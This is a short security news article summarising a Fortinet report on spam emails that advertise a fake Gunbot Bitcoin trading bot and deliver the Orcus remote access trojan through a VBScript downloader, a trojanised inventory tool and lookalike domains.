Fake Gunbot Bitcoin tool spreads Orcus RAT via spam
Fake Gunbot Bitcoin tool spreads Orcus RAT via spam

A remote access trojan is targeting Bitcoin investors using spam emails claiming to advertise a new Bitcoin trading bot called Gunbot but instead spreads an Orcus RAT malware that looks to steal Bitcoin and more.

Orcus is advertised as a Remote Administration Tool but offers features that go above and beyond those of typical RAT's such as the ability to disable the light indicator on webcams so as to not alert the target that it's active.

While Gunbot is a real product, the advertisement is fake and contains a malicious attachment containing a simple VB Script that when executed downloads a file from a PE binary file, according to a 7 December Fortinet blog post.

Researchers said the threat actors either lacked the technical knowledge and simply bought the components used in the campaign or didn't have any intention of hiding the malware's behaviour based on the comments left in the script which described each step of the codes execution.

It is also possible that researchers don't care about being spotted by some as long as there is someone who double clicks the file without properly inspecting its contents.

“At first glance, the downloaded executable appears to be a benign inventory system tool with a lot of references to SQL commands for inventory procedures,” researchers said in the post. “After further analysis, however, we found that it is a trojanised version of an open source inventory system tool named TTJ-Inventory System.”

The threat actors used a site designed to imitate the bitcoin forum bitcointalk.org to download the malware disguised as the Gunbot tool which contains a similar trojanised “Inventory System” as well as the VB Script downloader.

Researchers traced the domain and found it to be registered to “Cobainin Enterprises” and found other questionable domains registered to the same domains. The domains used similar names with replaced letters and when accessed, displayed a “We'll be back soon!” message.

Researchers speculate that the threat actors cycle through these sites between their malware campaigns with one of the websites leading to a fake Gunbot site.